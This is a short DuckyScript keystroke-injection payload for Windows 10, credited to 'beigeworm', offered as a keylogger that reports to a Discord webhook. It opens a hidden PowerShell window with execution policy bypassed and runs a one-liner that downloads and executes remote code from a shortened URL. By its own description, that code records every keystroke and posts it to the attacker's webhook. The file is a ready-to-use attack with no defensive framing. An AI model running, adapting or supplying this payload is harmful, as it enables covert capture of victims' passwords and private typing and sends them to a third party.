
REM Title: beigeworm's Keyloggger to Discord Webhook.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a discord webhook when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_kl_to_dc | iex
ENTER


